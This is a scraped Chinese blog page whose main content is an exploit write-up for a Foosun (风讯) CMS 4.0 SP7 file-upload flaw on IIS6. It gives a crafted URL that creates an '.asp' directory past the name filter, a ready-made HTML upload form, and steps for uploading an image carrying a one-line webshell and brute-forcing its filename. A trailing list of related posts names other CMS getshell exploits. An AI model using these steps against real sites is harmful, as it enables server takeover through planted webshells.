发现者:bloodsword、bink,转载请无视
影响版本:<=4.0 sp7,前面的版本没去看,估计也能日。
利用条件,开启了文件上传功能,iis6环境。
漏洞描述:建立目录的地方,名称过滤上有失误,导致可以绕过过滤建立一个.asp目录
首先注册个账号访问http://www.bbb.com/User/CommPages /FolderImageList.asp?f_UserNumber=06150583700&Type=AddFolder& Path=/userfiles/06150583700/aaa.asp//&CurrPath=/userfiles /06150583700其中这个06150583700是你的userid,登录了直接可以看到,建立一个.asp目录
因为风讯浏览目录的地方也过滤了.,所以建立的子目录进不去。本地构造表单:
<form name="FileForm" method="post" enctype="multipart/form-data" action="http://www.bbb.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp"><input type="hidden" name="AutoReName" value="2"><br><input type="hidden" name="Path" value="/userfiles/06150583700/aaa.asp"><input type="file" size="20" name="File1"><input type="hidden" name="FilesNum" value="1"><input type="submit" id="BtnSubmit" name="Submit" value=" 确 定 "><input type="reset" id="ResetForm" name="Submit3" value=" 重 填 ">
</form>
传个夹带一句话的图片上去
恶心的地方来了,传上去的文件名是日期+时间+5位随机数(可能是4位3位2位1位,反正最大5位),这个我跟bink研究了半天,没有办法看到-_-,用管中窥豹有个暴力猜接上传路径的功能,先在正常目录里上传个文件,卡一下本地跟远程的时间差,然后传到.asp目录里,把秒数误差控制在3秒以内,开始跑吧~~然后自己该干嘛干嘛去,RP过关的话几个小时内应该能出结果-_-

风讯 4.0 SP7 getshell 0day相关推荐

  1. 风讯4.0数据迁入dede系统的简单脚本

    2019独角兽企业重金招聘Python工程师标准>>> 公司老网站改版,新版本用的是dede5.7,老版是风讯4.0 没有现成的工具.自己写了一个简单的.有需要把其它系统迁入到ded ...

  2. PageAdmin Cms V2.0 getshell 0day

    黑小子在土司公布了"PageAdmin cms getshell Oday",并给出了一个漏 洞的利用EXP.经过危险漫步在虚拟机里测试,存在漏洞的是PageAdmin Cms的次 ...

  3. 风讯 4.0之前所有版本通杀拿SHELL 0day

    直接:/admin/SelectManageDir/FolderImageList.asp?Type=AddFolder&Path=/UploadFile/1.asp//&CurrPa ...

  4. thinkphp v5.0.11漏洞_ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞

    12月9日,thinkPHP5.*发布了安全更新,这次更新修复了一处严重级别的漏洞,该漏洞可导致(php/系统)代码执行,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的ge ...

  5. 通杀IIS7.0畸形解析0day漏洞

    先合并一张PHP一句话图片马,合并方法: ①.DOS合并:copy 1.gif /b + 1.txt/a asp.gif ②.用edjpgcom,进行图片和一句话木马的合并, 图片随便找一张. [顺带 ...

  6. php中提取%3cdiv,cmseasy getshell 0day

    by zvall 代码如下: celive/index.php 代码: [php] $_SESSION['thislive'] = md5(time()); $_SESSION['thislivetm ...

  7. 齐博 php7,齐博cmsv7.0后台getshell

    0x01 漏洞分析 此漏洞比较鸡肋,需要后台权限.漏洞原理很简单,这里就简单分析一下. 漏洞出现在:inc/class.inc.php中的GuideFidCache函数里/*导航条缓存*/ funct ...

  8. 齐博cmsv7.0后台getshell

    前言 预测下,VG要夺冠.加油 0x01 漏洞分析 此漏洞比较鸡肋,需要后台权限.漏洞原理很简单,这里就简单分析一下. 漏洞出现在:inc/class.inc.php中的GuideFidCache函数 ...

  9. http://122.13.0.201/vote/list.php,风讯dotNETCMSv1.0免安装版源码

    [版本功能介绍] dotNETCMSv1.0是一款具有强大的功能的基于ASP.NET+MSSQL构架的内容管理软件,国内领先的第一款开源的.集成web2.0元素的.模块化的CMS建站系统. dotNE ...

最新文章

  1. linux编译警告不能连接,linux编译警告信息
  2. python文件运行问题
  3. 廖的python教程_学廖老师的python教程想到的
  4. 华为v9计算机在哪方面的应用,华为荣耀V9和华为Mate9区别在哪 哪款更好?
  5. html设置顶部对齐,HTML / CSS文本从div顶部对齐
  6. Ubuntu配置TFTP服务器
  7. PL/SQL跨库查询数据
  8. 数据库系统工程师教程 (第三版)前言
  9. 车辆加速性能测试软件,汽车动力性能检测
  10. java时间数字转换成大写显示
  11. win10任务栏无反应解决办法
  12. 第六章 字典(访问、修改、遍历)
  13. Nginx事件管理之epoll模块
  14. Office 2013 Excel 转换 Word
  15. linux下如何打开iso文件夹,Linux下打开ISO文件两种方法
  16. Python爬虫系列之爬取微信公众号新闻数据
  17. 游戏开发中常用的数学知识---矩阵(一)
  18. 《网站分析实战--如何以数据驱动决策,提升网站价值》学习笔记
  19. 朗伯辐射强度模型MATLAB,基于室内非定向的可见光通信系统的朗伯光源阶数优化...
  20. python计算灰色关联度

热门文章

  1. 形容等待时间长的句子_描写等待时间漫长的词语句子
  2. Altium Designer 20 入门基础知识-环境设置
  3. 线性代数学习笔记——第六十八讲——柯西—施瓦兹(Cauchy-Schwarz)不等式
  4. LabVIEW与西门子1200 1500通讯工具包
  5. 扬声器测试专业软件,AudioTester免费版
  6. 一个人再牛,最终还是要靠团队
  7. 计算机二维辅助设计课程设计的目的,cad实习目的
  8. linux系统上insar处理流程,insar的软件-gamma.doc
  9. 在我最需要你的时候你选择离开,如今你却回来......
  10. JUC高级-0625